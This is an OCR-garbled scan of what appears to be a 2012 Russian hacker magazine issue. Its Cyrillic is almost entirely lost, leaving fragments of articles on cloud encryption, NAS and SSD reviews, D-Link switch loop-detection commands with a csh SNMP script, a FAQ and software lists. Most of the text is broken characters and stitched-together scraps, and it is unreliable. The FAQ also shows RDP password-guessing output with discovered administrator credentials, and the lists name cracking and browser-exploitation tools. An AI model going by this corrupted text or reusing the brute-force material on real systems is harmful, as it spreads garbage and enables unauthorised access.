grinder lgrinderliHux.in.ual
LUKS- ~
google.com/o/
J1.\illiiJ!
vGate R2 -
securjtycode.ru/
oroducts/sn ym-
ware/ygate com
MySQL 5.6
Reference Manual
- Encryptjon and
Comoressjon- clck.
!Lfru
Windows Azure SDK
- microsoft.com/
wjndowsazure/sdk
Novell
Cloud Security Service
novell.com/
prodcts/cloud
securjty-service
FreeOTFEfreeotfe .org
<<>>
n
""Jr\1
>>
<< . ,
IPaaS)
ISaaS) ,
.
,
.
, l
). , . <<
,
, , ,
- .
, ,
, .
, ,
v - i de x .com ,
38,9 %.
,- . ,
. ,
PR,
- ,
.
,
: - .
,
,
SaaS.
, ,
. ,
122
Amazo,
<< ,
01 /156/2012
ctt o --<08
, << >>,
V-I NDEX 03 2011
VIRUALI ZATION
PENERATION R
CONSOLIDATION
RATIO
38.9%
5:1
11!::8
IICI:I
! >> !: -
, .
HYPERVISOR
INUSE
. , Compu teWold,
, ,
, VMwae
vSphee.
SaaS
- .
, ,
""'
............. ~ ...
--wy ---....
Cif'q)o'9!f"~fii~<PI'I'
:-...::""
.. -lllt~
.. --~--
SaaS
.
, -
. -
. ,
v-index.com, n
! ! .
,
, -
- .
- ->> ,
<<>>. ;l
, VMwae,
. ,
- .
.
!
VMI. ,
, ! AC L ! .
vGate
- ,
IABI II
VM,
la !
. ,
, ,
-.
, . ,
.
DMZ
IVPN, /etc/host.allowl.
DDS-
.
.
l gnu.og/philosophy/who-does-that-seve-eally
, n.
SaaS
SS-
. , . ,
.
,
, .
f\lo,a)'I(I-....Gitl"-eAI:IW-~01..__-oADCrj'!\1,
~~~~-..,_
-1)'---e,l.l.
. ?
.. ,._, atip.~a,._.
,
.n.S-;u~JI
, , ,
SaaS , ,
,
- VMwae
vC ioud
diton.II-~II~Aor;ryN~r<~
.Crpoom.un:r-oc<,'I'JIDf~&-.......:o;riiiiQflol'*"'
0~)'1('1
Die c to .
0(< 19:2909-0).2011)
- ,
.
. ,
01 /156/2012
v&ate
1Z3
SYN\ACK
- Novell Cloud Secuity Sevice INCSS, ovell .
com/poducts/c l oud-secuity-sevice l-
,
>> .
NCSS
>>
[ A!:tive Diectoyl. ,
SaaS/PaaS/IaaS, , NCSS
, -
, .
SaaS
Amazon 21,
NQ152
, .
. ,
<<>>
. ,
SaaS
. ,
<<>>
. ,
, ,
, . -152
, ,
, ,
, << >>.
, ,
. ,
, ,
<< >>. ,
, .
[ !,
SaaS .
HTTPS,
. , <<
, -
<<>>,
PCI [Payment
d lnfastuctuel,
, : << >> - .
, ,
DM-CRYPT
, ,
,
PCI,
dm-cypt ,
2.6+
CyptoAPI.
, ,
, - . ,
- ? ,
ht.
<<
>> .
Windows
FeeOT F E,
Windows.
/dev/mappe/ :
Windows
Windows -
, .
Bitlocke [ - EFS,
. ,
. - n ,
, . n,
MySQL
Refeence
Manual
n. 11.13
Ecyption
01/156/2012
111rmll
ySQt..
5.6
~fetnc
Mlr'll.l.al :: 11
F\.11'\Ctns
RYPTSEUP ( 8)
11.14lrlfonn.1tionfui"ICttOnJ
T.J811 . 1 7 . encryprionfun~rions
SctiorrNIIvlgatlorl
(T<>ttkJ
11 FunonrandOpertors
011/YIII UIIngAI:B
11. 1 Functn.dOpllfiltOc"
o.t!YIIIIlflg
t1 .4CO<"I'OIAowfi"ICOm
EI'IUYIJ(IJiriiiQ
Clkul118 1ndlltUIIIIPIIswordS.-u.g
an .-.- 2 thecbum
:i1Z.
CaltW.Ie
Un<OI\'II)IfiiiSirl/>oComprtiSt
t~anged
deviceJRllpper 11111ppings.
For ba stc
-~
11 7Dateilfld"mefunctJOnJ
"""''"'
11.9fuiTetS..udlfurtenons
create s
ltlOCe;Ft.nttrOnsiOnc:IO(IeriltOI"J
I! . IIXL~
$et , -- skip ,
n enci)'PtiOn i!lnCI compresston tunctlons return stmg:s tor\lif\\cnthe resun mtgf\1: coota'I ~ IJy1eV31Ues
rr you want to store tnese re~. use coturnn Wlth Y!J!I.1A&X or 1! blny $111nQ data rype Thr, ll(dlvold
potential problems -.wn tralllng space removal or th.ractr set CD!"!,-,IOn th31 WOVId tharoge data vatues.
~n
as
11 . 13EI"IO'VI)t.IOnilndComores510
backed
device <device> .
pping
< n>.
<nome>
reports the st11tus for the
11 . 16Ft.lndJO/\'Jiidodd"rersfor
Use
118PP1IOJ <n>
11 . 17SI).IA!Extensrons
11 18 Preosn Math
Functions,
ll.t5ielilf\o80USF~
MySQL n 15
upping wi th
only l
'""""""
<options:.o can
-- relld -
!JtiiW!.I. <nllme>
11-14111fOtm.atnfunctJOnS
Compession
ESCRIPION
o l l J2kfurw:ti'OnJ
and
dii Cypt
11.8WhiltC.alendilrlsUsed8y
Clll.utalllll05tn.o:um
no~ "
11.61-Unent f~ill\d
Enltlirla
you use
Co~~r~ands
YNOPSIS
cryptsetup <options:o- <action:> <actio n illrgs:-
IJ .OI)er<rS
115StmQFt.c\ctJor\s
EI!CJVI)III~
m~ occtJ 11'
1'1111ntenance
CRYPTSETUP(8)
15 .
f:'l
8 "n!rmlnal
Linux
dm-crypt
SQL- n
n,
, n .
, n ,
n .
n . n ,
,
Tend i SecueCioud, n
F eeOT FE .
<<
API
n .
n ,
, , n
l micosoft . com/windowsazue/sdk ), n
Windows Azue,
, n n CSP ICyptogaphic Sevice P ovide,
. n
n n ).
vCioud.
n,
, n
n
XSS
n . n
Amazon
2,
Eu calyptus
. ,
/ .
, n, n n -
, n
<<>>- , , .
n , n
, n n
, . n
, ,
n , ,
. , . - ! n
n ! , )
. ::::
Pli!aseenwlh!rurD!rofPIIICDF21:tylte"llcf&to~arriedaulcrr>yoru
~dtogenertea'ltnei1'PfDI
hene-lhei"'U'I'Oc!r,lhegr18"1heSLntyoffi!redu!lheslowa
_,~ng
c{~if,_.,tn;rlhe...._on.POA)
..
olle:JfisvQII~Ifflfl'litldeflolt,youwie~toen!l!rLI
v"-'e~tmeyoui!IOI.nt'fO-'~forthis/"USIOI"IitiSr~INt
-UierlluV'I!itltlt.dtflth~ ..ne:s~irii!*o.Jirnted\l:ldo
~.
Tend
FreeOTFE Linux
01/156/2012
Micro SecureCioud n n
< ))
125
FERRUM
.,
As
5- 6-
NAS-CEPBEPOB
NAS]
\7
.
.
,
, . , >>
. -
RAID.
RAID.
n , n n .
, n
? - n
100
NAS.
n ,
n .
NAS
, .
n n n .
. n
, n n n
n . n n
RAIDO.
RAID5
n .
n , n .
, - n
NAS.
n .
/J
126
01/156/2012
NAS
D-LINK SHARECENTER
PR01200
0-Link
~-t , n Ethenet
USB.
n
L-n . ,
n ,
n .
, ,
. ,
, ,
-n
.
0-Link
ShaeCente
1200
. n ,
n .
-
0-Link
. ,
n
iSCSI.
- .
NETGEAR READYNAS
6ULTRA
n
NETGEAR
.
n .
NETGEAR ReadyNAS
6 Ulta
2 . , n
12 ,
. n
RAI05.
, .
01 / 156/2012
127
FERRUM
1,8
Atom,
lntel Pentium
2160,
. ,
n . ,
.
. n
F ontView
4.2.16
-,
RAID5
Boot Menu.
-,
. ,
,
<<>>. ,
,
.
QNAP TS-559
+,
QNAP
QNA P
, <<
.
QNAP TS-559
,
, .
VG- . ? ,
,
.
TS-559
VGA
QNAP
+ .
,
.
RAID5
<<
,
n .
D-Lik S h areCe
128
NETGEAR ReadyN AS
6 Ultra
NETGEAR
ReadyNAS6
Ultra Plus
01 /156/2012
NAS
,
, .
. ,
y QNAP
5-559 +,
5ynology
Ois k5tatio
0515 11+
jl!-
, ,
, . ,
.
, -
. -
45
THECUS N5200XXX:
.
,
NETGEAR:
, , , .
>> : l tel
Atom 0525
. ,
.
.
, .
L-, /
LAN- U5-.
Thecus N5200XXX
, .
, << ,
>>, , ,
.
THECUS
N5200XXX
, ,-
.
,
Oual , 1,8
OOR2, 1 1
2 Ethernet 110/100/1000 /l, 4
USB 2.0, 2 eSATA
JBOO, RAIO , RAIO 1, RAIO 5, RAIO 6,
RAID 10
CIFS/SMB, F, TFPT, UPnP, OLNA.
, AFP, NFS, Bonjour, ISCSI
NA5,
5-
6-. , ,
5ynology
Thecus.
QNAP,
<< .
<<
NETGEAR.
NA5
[ !,
. ::
01/156/2012
129
FERRUM
SP060GBSSDVOS25
SILICON POWER
: 550, 2, 5
: 5 3.0
: MLC
.
I Ome t e,
. : 550 /
. : 500 /
SSD /
: 60
n TRIM :
, .
IO mete'a,
,
:
. . k
HDD,
Vantag e,
. ,
Disk
B enchma k
550, ,
,
0,5 8192
n.
- 550
.
Si1icon Power
5P060GB55DV30525. -
60 , Windows 7
n
, San dF oce
SF-20 00
MLC .
3-5 ,
.
Silico w
SATA 3.0,
IOmeter:
Radom read 4 : 21,44 /
Radom write 4 : 19,77 /
Seq. read 128 : 313,41 /
Seq. write 128 : 332 /
IOmeter patterns:
Database: 36,43 /
Fileserver: 41,08 /
Workstation: 34,50 /
Webserver: 51 ,35 /
PCMark Vatage:
Test Suite: 26076
Windows Defeder : 42,95 /
Gamig: 176.73 /
lmporting pictures to Windows
Photo Gallery: 271,45 /
Windows Vista startup: 30, 18 /
Video editig using Windows Movie
Maker: 88,42 /
Windows Media Ceter:
340.73 /
Add i g music to Windows Media
Player: 151,54 /
Application loading : 167,14 /
130
. ,
est Results
0.5
1.0
2.0
4.0
8.0
16.0
32.0
64.0
128.0
256.0
512.0
1024.0
2048.0
4096.0
8192.0
-..
Write -
Read -
100 200
Write
Read
1961 3
35239
50435
16411 7
237596
316007
446227
463553
486711
488856
493674
492542
493674
489176
493674
17280
32256
54001
128548
179971
347832
396128
426883
464703
529998
546588
554109
559240
559240
556663
, ,
IOmete,
.
Sili co w
:
3 , 5 -
SSD,
480
,
,
.
w
SP060GBSSDV30525,
Si licon
. :::::
01 / 156/ 2012
3 000
000 *
MAN TV
PHREAKING
Rx
Receive
Transmit
(n n! .
Loop-arn. ,
, ,
, .
, . ,
, .
- : ! :
- . ,
,
,
,
. -
,
. ,
, .
[boadcast stoml.
, ,
. , ,
- [. 11. <<-
... - .
loop_detection,
[! .
, - .
,
132
,
.
01 /156/2012
Loop
1. RJ45
: [
[ Ethenet [
Telnet
w-l.
.
Ethenet, I-.
1.
W-
, , . . , w
80
- I-.
DLINK DES-3200
-,
.
1.
I-
:
DES-2ee# cofig
ipaddress
ipif System \
.../....
. . . -I-, ....- .
2.
, I- ,
:
w-
IP-
D-Link
RS-232,
,
,
Out-of-Band.
,
.
[, mil
Windows[. :
Baud rate: 9,
Data width: 8 bits
Parity:
Stop bits: 1
Flow Cotrol:
Lk-
t .
,
DES-3200#.
, ,
, , .
. , tl+,
<<? ,
.
,
config,
133
PHREAKING
~
1... 8
----<
-----<0
RJ-45
DES-3288#config +
delete account
<usename>.
,,?" t.
w- Telnet,
I- ,
. I-
CLI:
.
-
.
: Admin Use.
Admi .
System- .
.
CLI:
. 0-Link
(!. n
n)
,
: << t case-sesitive w passwod>>.
0-Link
15
cofig pots. ,
, 10 /,
Success.
1-3
Admin :
Username "dlink":
DES-3288#create account admin dlink
Command: create account admin dlink
Enter case-sensitive new password: ****
Enter the new password again for confirmation:****
Success.
DES-3288#
: OES-3200# config
account
NVRAM.
save:
<usename>
DES-3288#save
dlik:
134
,
,
01 / 156/2 012
Loop
Command: save
Saving all settings to NV-RAMoo
doneo
DES-32ee#
1%
LOOPBACK
r .
t:
IJ
- n n ,
n n
n. ,
lk-.
DES-32ee#reboot
Command: reboot
. <<lk->>.
, , ,
, n .
eset.
DES-3200#eset config
-, n
eset, .
Cshell,
Hello word
# !/in/csh
loop_detection Alcatel
interface range ethernet (1-24)
loopback-detection enale
exit
loopback-detection enale
loop_detection Dlink
loopdetect
config loopdetect recover_timer 1
config loopdetect interval 1
config loopdetect mode port-based
config loopdetect trap n
config loopdetect ports 1-24 state enaed
config loopdetect ports 25-26 state disaed
loopback .
.
, , -
, U-, , ,
# vero 1
# , ~ n
i f ( ' ps 1 grep ' redbut' 1 grep -v 'grep' 1 wc -1' <= 1 )
then
# , snmp
set snmpdir = " / usr/ local / bin / "
set community = "puic "
# snmp
set snmpcmd = "-t1 -r1 -Oqv - $community -v1 -Cf
set mib_stat = "IF-MIB: :ifOper Statuso$2"
set uid = "$1"
set fl = ' '
#
while ( "Sfl" == )
set nowstatus = ' $snmpdir/ snmpget $snmpcmd $uid
$mib_stat 1 sed 's / up/ 1/ ;s / down} e/ ;/Wrong/d ' '
i f ( " $nowstatus " == 1 ) then
echo 'Hello Wo r ld'
# e-mai l
echo " ! Hello World!" 1
sendmail -f[__] [_]
<< n . - .
[Rx Txl .
endif
sleep
end
endif
exit
2 6, 1 3.
, , -
-. .
n n n :
3.
, << >>
o/scriptocsh
I_
link . Ypal
,
n << !
. , , ,
,J HELLO WORLD
Hello wold?
! n
n , n
- !
~ v.. n
n n ,
n , ,
: ?
n [ .
41.
n :
? ,
,
. << >>,
.
- -. n
n , >>,
, - .
, n . n
. ?
. . ? !
n
01/156/2012
loop_detection , <<>>.
, n .
! :::
135
UNITS/FAQ UNITED
[lwliller.com/slepahl
FAQ United
r.t
FAQriREAL.XAKEP.RU
OpenSSL
n .
....
LINUXCEPBEPE?
lr,8
Server
SSLv.
SSL- . n
DHE-RSA-AES256-SA
OpenSSLI -,
n
puic
key is 2048
bit
Linux-ccee,
OpeenSSL
TLSv1/
. ,
OpenSSL
speed test,
OpenSSL
4.
n n sh-. ,
, ,
n:
, ,
,
.
1.
GnuPG [www.
gnupg.org l, n
OpenSSL:
2.
5- .
[F., . . l
OpenSSL n
SHA 1-1 SHA1
, SSL!TLS
n
nn NS- ,
I-
OpenSSL.
DNS-OTBETOB
&-.
3.
file-test -64:
r.t
....
5 :
debug.exe.
64
. , debug .exe
Microsoft .
, Windows 7 Server 2008
PowerShell,
BIND [www.isc.org l.
NS-
DNS-c epep,
BIND,
ApateDNS [ it . ly/sZQiK1 1.
suit-n
Mandiant.
n NS - n
, .
I-, .
, ,
, ,
, n
ApateDNS [ n i,
NS-.
hosts?
136
DNS .
01 /156/ 2012
FAQ UNITED
. ?
.
<<
>>
PoweShell:
did
NDRID-,
. ,
ANDROID?
GOOGLE,
!
,
,
Andoid'a,
Andoid ~DK,
. ,
86. -
hexdump.txt -
. ,
Andoid -
77 9 144
184
64
255 255
232
ARM
Bluestacks
Bluestacks
I uestacks.com l. ,
l http:Uit.ly/Ys901 l,
did-,
14 31 ....
ach tne
Qevtces !felp
~ _J
. !
,
~~
!,
!
!.
Store
S-:
.....,
Camera
..
'"'
Facebook
Plu s
lr
- ~~
AppBra in
Mark ...
Blapk
Market
Browser
Clock
Contacts
Gallery
Dev Tools
"
~
Global Time
..
";~.~~/,...
jetBoy
L...LLU
11
Calculator
"
Email
r-
~
Latitude
Calendar
f.
Facebook
Lunar
Lander
Android-x86, n
Nexus One!
EJ
VirtuaBox,
n n ,
FakeDNS I it.ly/szUFXI I.
DNS-
Malcode
Python !
40 !
IJ
HostsMan I it.ly/uZAVOX I.
DNS-,
DNS-
' . I
hosts.
, ,
I- . !
fakeds .p y,
. , , 99%
01/156/2012
:1
137
1:'.1
n . n
. ,
CRL + SHIF +
, n
ESC?
Medium [
). , n
Process l
[bit.ly/ugFDpx) n Replace
Task Manager, n
181
High.
Low, Media
192.168.26.137:3389, CL=2
rdp://192.168.26.137:3389 (EIO 1) Login
failed: 'administrator' 'admin'
n , -n
Oiscovered credentials
rdp :// 192.168.26.137:3389 'administrator' 'admin123'
. n
Pro cess
[View 7 Select
Columns 7 lntegrity Level). n
r.1
1:'.1
n n ,
- ? n,
nn :
- n ,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Image File
Exec ution Options\taskmgr.exe
taskmgr.exe
usermode.
, n, n,
KeePass
n n ,
KeePass
netsh n
- .
[n,
: \u ti 1s\Process 1 \ . ) .
High,
KeyPass
n. l
dump:
r.1
1:'.1
1'.8
. n
. - ,
nn n n
NETSETMAN [WWW.NETSETMAN.COM )?
181
,
, .
Debugger
n
:
n [
KeyPass) n
- n
# ------------- -- -------------------
WEBSOCKE?
n ,
pushd interface ip
n,
. ,
181
1.
n -
2.
, ,
n .
n ,
, -Wireshark
Run as administrator.
n .
[www.wireshark.org ).
n n
n WebSockets,
icacls,
n,
n [n,
SOAP).
n Firefox
- Temper Data [ it.ly/sM49Hk ),
Chml [ it.ly/sOBLCm ). n,
"-i:h") n n
"-nr"):
n ,
n
nn~
netsh -1:
netsh -f netsh-config1.txt
r.1
1:'.1
WINDOWS
LEVELS?
INTEGRIY
file.zip
Access is denied.
, n,
. :::
Windows Vista, 7
Server 2008,
, - mandatory integrity level s [MIL).
181
n,
RDP ?
n ,
181 n
n , n,
Microsoft
n -n
n n
, n.
n nn
. n
RD
n n
. n :
n ~ ~ ~~~ 1~ ~ ~ 1:~::--~;;:?.J
..:.]
n ,
138
,
n ,
r.
U~delihed 1192168.86129
FakeDNS DNS . .
01/156/2012
A~ache
CIAT 1.02
ClamAV 0.97.3
DirBuste 0.12
AutoHideDeskto~lcons
~roximity
>Deskto~
~~
lncrediMail 2.5
Koma-Mail 3.82
LiteManager 4.4.1
NetMeter 1.1.4
NetWorx 5.2.1
Pokki
RadioCiicker 8.11
Free[!roxy 4.10
Cli~Gab
Cheese 3.2.2
Clementine 0.7.1
Coolreade 3.0.43
Dvdisaster 0.72.3
Freecad 0.11.4422
Gnu~lot 4.4.4
Handbrake 0.9.5
lmageagick 6.7.3-8
K9coov 2.3.7
1.2.5
IDclassifv 1.1
GenXE 0.9.0
Go l15MERO
Gsasl1.6.1
HOPPE R
Gadmin-openvpn-server 0.1.5
Fwbuilder 5.0.0.3568
>Securit~
Chatsniff 1.0
Clamtk 4.36
UNIX
>Net
5~stem ~l
3.6.2
WhoCrashed 3.02
Mouse Button Control 2.0
5ongird
Perestroika 4.0.0
Real em~ 3.60
5mart Delrag 2.2
Nimi Visuals
Aweather 0.6
Chrome 15
Dada mail 4.8.4
Evolution 3.2.2
Fiefox 8.0.1
Getleft 1.2
lnstantird 1.1
Knemo 0.7.2
Ktorrent 4.1.3
Lft~ 4.3.3
Liferea 1.6.6
Lin~hone 3.4.3
Linuxdc2P..llQ.
5muxi 0.8
5tealthnet 0.8.7.9
5wift 1.0
Tvdownloader 0.7.2
Watchvideo 2.2.1
1.10.1
5TDU Viewer 1.6.62
?.9 lmage Viewer 1.3
Ubuntu 5kin Pack 8.0
WindowTabs
DTaskManager 1.51
Free File Unlocker 1.0
GPU-Z 0.5.6
Tune 5.0
HDCione 4.0.7
JaBack 9.12
1.41
>S~stem
>Multimedia
>Net
WP5can 1.1
X-5can 3.3
0.9.1 7
E!_i~ear2.4.0
Netrek 3.3.0
5umataPDF
>Games
Nant 0.91
Open64 5.0
Padre 0.92
~ 1.7
Quexml 1.3. 7
.,t2 2.0.5
Ruby 1. 9.3-pQ
'@!grind 3.7.0
M aveyUo_3.0
Libmicrohtt~d
~lass2.0.0
Gtk 3.3.4
Javatools 0.44
Jvcl 3.45
~__l_
NetworkMiner 1.2
GenXE 0.9.0
Hades
John the Ri~~er 1.7.9
MagicTree 1.0
MeMMoN
NetworkMiner 1.1
BeEF 0.4.2.11
. 9
tika 1.0
Dlib 17.44
Freebasic 0.23.0
Geany 0.21
>Devel
>Securit:t
Ariadne
Virtual Router
TweetMyPC 3.9
VideoCacheView 2.02
Terminals 2
Libreoffice 3.4.4
Metamo~hose 1.1.2
Ni~2 7.26.3
~
P~room 0.4.1
Tomboy__11]_
Wavesurfer 1.8.8~3
Xine 1.1.20
Xorriso 1.1.8
RocketDock 1.35
1.9
UboroBot 2.0
ViewFD 2.3.0
Votumouse 1.72
Win5~1it Revolution 11.04
Rainmeter 2.1
7stacks 1.5
Droid ~l 0.8.8.2
EssentiaiPIM 4.5
FavBackup 2.1.1
Fences 1.01
FileMenu ools 6.0.1
FreeCommander 2009.02
Pointer5tick 1.21
Q-Dir 4.87
>Misc
5DL 1.2.14
5t~leCo~ 4.6
TRe~lacer 2.11
Utilu IE Collection 1.7.2.0
~~ter2.4.3
AjaxControiToolkit 4.1.51116
DEV-C++ 4.9.9.2
Dia 0.97.1
Facebook # 5DK 5.3.2
1.4.0
Heidi5QL 6.0
HiAsm 4.4
Json.N ET 4.0
Mocha 0.0.8
PHPExcel1.7.6
V5 1.1
>Develo~ment
WINDOWS
12.1
WinamD 0.7.1
DeTune 1.0.6
DVDTheque 3.1.2
GitHub 1.1
GV Connect Widqet 2.1 .1
JollysFastVNC 1.32
Mag ican 0.9.63
Mou 0.7.0
RaidEve 2.0
5ource 1.2. 9
Tincta 1.3.1
Veusz 1.14
VMware Fusion 4.1.1
Amava 11.3.1
,t;p~ Hack 1.1
Aotana 5tudio 3.0
Art of lllusion 2.9
1.2
Q~en5U5 E
>X-distr
0.8.6
Css20111030
Di 4.31
Freei~a 2.1.3
Glpi 0.80.5
Greo 2.10
Libertine 5.1.3-2
Linux 3.1.3
Pis 6.1.0.8729
Pl-kernel 3.1.3
~~nctool 5.1
Virtualbox 4.1.6
Webmin 1.570
Winetricks 20111115
Zabix 1.8.9
A~t-dater
>System
Postg~!.i.lJ
Aoache 2.2.21
Asterisk 1.6.2.20
Bind 9.8.1 - ~ 1
Cu~s 1.5.0
DhcQill
Dovecot 2.0.16
Freeradius 2.1.12
1!ghtt~d 1.4.29
"11291 5.5.18
Nsdi2.9
Openldap 2.4.27
Openvpn 2.2.1
Postlix 2.8.7
>Server
~wi re 2.4.2.2
w3a-f-1.-1- -
~swan4.6. 1
. 7.1
ENCRYPTION
HAHTML5
PHONEGAP:
---
36 , 60
II .
L-
XML.
ANDROID
(j
2~:g
--"
frlhnrmet
trame}IIIIJd
:230.
800
!
191
2200
. (]
23/ ,
(250 )
- 30 ,
- 31 ,
- 31 .
8.5
DVD
!
!
,
, :
+ OVD
Total Football
+ OVO
DVD
OVDXpert
+ OVO
+ OVD
Smoke
+ 2 OVD
+ OVO
Digital Photo
+ DVD
+ DVD
1.
, ,
2.
3.
shop.glc.ru .
500
12
6
2200
1260
.
.
- -
000
+ +
2 DVD:162
, .
[ 35 % , )
!
.
12 3890 [24 ]
6 2205 [12 ]
? infocJglc .u
, , ].
no n
8[495]663-82-77 [ ! 8 [800] 200-3-999 [
D
D
12
_ _ __ _ _ _ _ 2011
7729410015
000
"
>>, .
No 40702810509000132297
No 30101810900000000990
D
D
04453990
**
( )
( )
770401001
<< _ _ _ _ _ _ _ >>
. . .
2011
. . .
7729410015
000
<< >>, .
/
No 407021 0509000132297
No 30101810900000000990
/
Q
<<. _ _ _ _ __
"" n r
n1-1 111
770401001
( )
044583990
...
>>
2011
UNITS/WWW2
ldliilildil\fJII
www . outepw n. com
, n
. , mac_find [
-l phenoelit [
l. -
, . ,
, ,
I- . ,
:1.
lti[ltllil
ki cksend.com
,
Rapidshae , n
. -
, n
. , ,
, , n: <<
1 .
500
? , ,
- .
111111
@proXPN
Wllatpro~ll d.,.-
. upgr-.youton-tc_\IOII_,'o'F'Neno;rypiiOn
setont .. l'fpe1oolcometi!OifQIIIOSLatl<lc .... to3G
!Jt'\'OU1~:1"'<3!1._CI!IONWI!me\
ge/iii'IIPI<!'IIIIht.IS.A.UI(C(I'It
!lo\IO)OUtpiSS-CIC,ue<IIIC-U~Cie~
ometr.eplanas~on)'IIUI..,;tD ~.ts
po x pn. c om
, N,- n-lik-
VPN-cepep . ,
OpenVPN,
:!et!llle~)WVbl
lf.ltt.iif.lll
call:l
ctltl)1llon\les.
r.tconi.,.:Uwell~
n.r'llnotesiOIOUI-)'00~
, . ,
N . , . ,
. [
, WiFi-xocoyl,
.
..
VN-
JPC 2
Hom
IIVtrWIIId 10
jpc2.com
About JPC2
run 8ltOihlr opendlng system Iit 4ld not w.nt 10 ln8l8ll anylhlng?
Welllt811 Wll8t ...... VlnUIIIzatlan ln
w p8DI
<< >>.
JPC 2
, ,
jpc2.com,
Windows
Ubuntu-
Java
, .
Windows Ubuntu
01/156/2012
CODE
UNITS/ 2012
I I
NY2K+12
- ,
. USS
MUSTVISIT ,
20-23
: . -
14-16
30-31
2012
.d
Hack
Days
HITB
BLACKHAT
PHDAYS
confer ence.hitb.ora
www. ackhat
com
CONFIDENCE
www.ohdays.ru
PH DAYS
confjdence.orq.pl
, ,
. -
, -
, ,
. ,
26-29
F-.
25-26
2012
:1.
OEFCON RUSSIA
u
OCG *
7812
DEFCON
'2012
www.defcon .org
cc.org.ru
www.zeroniqhts.ru
, 20-
dmsn- .
- .
: -
. -
ZERONIGHTS
DEFCON
RUSSIA
www. d~f~oo-[yssja . [y
2011
, -
I/ -,
. -
'
'
'
01 / 156/201 2
I
*
OT&OPHbiE
, n .
, , n
TASH
.
3 .